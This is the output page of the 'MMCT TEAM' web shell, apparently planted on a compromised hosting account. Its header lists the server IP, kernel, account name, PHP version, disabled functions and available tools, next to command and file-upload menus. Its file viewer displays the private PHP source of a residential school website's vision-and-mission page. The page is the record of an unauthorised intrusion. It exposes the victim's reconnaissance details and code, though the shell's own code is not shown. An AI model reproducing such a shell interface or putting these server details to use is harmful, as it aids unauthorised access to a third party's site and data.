MMCT TEAM
Server IP : 86.38.243.181  /  Your IP : 216.73.216.51
Web Server : LiteSpeed
System : Linux in-mum-web1336.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
User : u986601745 ( 986601745)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u986601745/domains/emrskalsi.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u986601745/domains/emrskalsi.com/public_html/vision-and-mission.php
<!DOCTYPE html>
<html lang="en" style="overflow-x: hidden;">
<head>
    <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Eklavya Model Residential School - Vision and Mission</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Discover the vision and mission of Eklavya Model Residential School Kalsi, Dehradun. Dedicated to providing quality education, fostering growth, and empowering tribal students through holistic development.">
    <meta name="keywords" content="EMRS Vision and Mission, Eklavya Model Residential School Goals, EMRS Kalsi Educational Mission, Tribal Student Empowerment, EMRS Dehradun Vision, Quality Education EMRS, Holistic Development EMRS Kalsi, Tribal School Objectives, EMRS Uttarakhand Mission Statement, School Philosophy EMRS">
    <meta property="og:title" content="Eklavya Model Residential School - Vision and Mission" />
    <meta property="og:description" content="Discover the vision and mission of Eklavya Model Residential School Kalsi, Dehradun. Dedicated to providing quality education, fostering growth, and empowering tribal students through holistic development." />
    <meta property="og:image" content="https://emrskalsi.com/images/og_images/vision-and-mission.jpg" />
    <meta property="og:url" content="https://emrskalsi.com/vision-and-mission.php" />
    <meta property="og:type" content="website" />
<?php include('include/header.php'); 
$q = "SELECT * FROM about_emrs limit 1";
$result  = mysqli_query($conn,$q);
$vm = mysqli_fetch_assoc($result);
?>

<div class="breadcrumbs">
    <div class="container">
    <ul class="pull-left breadcrumb">
        <li><a href="javascript:void(0)">About Us</a></li>
        <li><a href="javascript:void(0)">Vision & Mission</a></li>
    </ul>

</div>
</div>

</div>

<style>.menshow{display:block !important}
    #acco_22c4fbe9 ol{
        padding-left: 15px;
        margin-left: 0!important;
    }
    
    @media only screen and (max-width: 600px) {
        .row{
            margin-left: 0!important;
            margin-right: 0!important;
        }
    }
</style>

</div></div><div class="row"><div ><div class="lab1 ">
    <div class="container vision0011">
        <div class="row inner-lab"><div class="wrap-lab1">
            <div class="col-md-6 col-lg-6 col-xs-12" ><div>


           <?php echo $vm['vision']; ?>
            <script> 
                $(".show-more-button1").on('click', function() {
	// If text is shown less, then show complete
	if($(this).attr('data-more') == 0) {
		$(this).attr('data-more', 1);
		$(this).css('display', 'block');
		$(this).text('Read Less');

		$(this).prev().css('display', 'none');
		$(this).prev().prev().css('display', 'inline');
	}
	// If text is shown complete, then show less
	else if(this.getAttribute('data-more') == 1) {
		$(this).attr('data-more', 0);
		$(this).css('display', 'inline');
		$(this).text('Read More');

		$(this).prev().css('display', 'inline');
		$(this).prev().prev().css('display', 'none');
	}
});
</script>
<style>.long-texts {
	display: none
}
.show-more-button {

    color: #090c93;
    font-weight: 600;
    font-size: 17px;

}
</style></div>

</div></div><div class="wrap-lb-image"><div class="col-md-6 col-lg-6 col-xs-12" ><div class="ap-section ">
  <div class="ap-image-section">

    <div class="ap-image 

    ">

    <div class="animated-box ">
        <div  class="image-outer-box">
            <img
            src="admin/<?php echo $vm['vision_img']; ?>" width="683" height="387"
            class="img-responsive image-inner-box "
            alt=""
            title=""

            >
        </div>

    </div>
</div>

</div>

</div>
</div></div></div></div></div><div class="lab1 lab2">
    <div class="container vision0011">
        <div class="row inner-lab"><div class="wrap-lb-image"><div class="col-md-6 col-lg-6 col-xs-12" ><div class="ap-section ">
          <div class="ap-image-section">

            <div class="ap-image 

            ">

            <div class="animated-box ">
                <div  class="image-outer-box">
                    <img
                    src="admin/<?php echo $vm['mission_img']; ?>" width="684" height="354"
                    class="img-responsive image-inner-box "
                    alt=""
                    title=""

                    >
                </div>

            </div>
        </div>

    </div>

</div>
</div></div><div class="col-md-6 col-lg-6 col-xs-12" ><div>


    <?php echo $vm['mission']; ?>
  <script> 
    $(".show-more-button").on('click', function() {
	// If text is shown less, then show complete
	if($(this).attr('data-more') == 0) {
		$(this).attr('data-more', 1);
		$(this).css('display', 'block');
		$(this).text('Read Less');

		$(this).prev().css('display', 'none');
		$(this).prev().prev().css('display', 'inline');
	}
	// If text is shown complete, then show less
	else if(this.getAttribute('data-more') == 1) {
		$(this).attr('data-more', 0);
		$(this).css('display', 'inline');
		$(this).text('Read More');

		$(this).prev().css('display', 'inline');
		$(this).prev().prev().css('display', 'none');
	}
});
</script>
<style>.long-text {
	display: none
}.show-more-button {

    color: #090c93;
    font-weight: 600;
    font-size: 17px;

}</style></div>

</div></div></div></div><section class="lab1 salientabt">
    <div class="container vision0011">
        <div class="row inner-lab"><div class="wrap-lab1"><div class="col-md-6 col-lg-6 col-xs-12" ><div class="ap-section ">


      </div>
      <div class="ap-section ">

        <div class="ap-panel panel-group" id="acco_22c4fbe9">
             <?php echo $vm['feature']; ?>
        </div>
    </div>


</div></div><div class="wrap-lb-image"><div class="col-md-6 col-lg-6 col-xs-12" ><div class="ap-section ">
  <div class="ap-image-section">

    <div class="ap-image 

    ">

    <div class="animated-box ">
        <div  class="image-outer-box">
            <img
            src="admin/<?php echo $vm['feature_img']; ?>" width="689" height="355"
            class="img-responsive image-inner-box "
            alt=""
            title=""

            >
        </div>

    </div>
</div>

</div>

</div>
</div></div></div></div></section></div></div>
<?php include('include/footer.php'); ?>

MMCT - 2023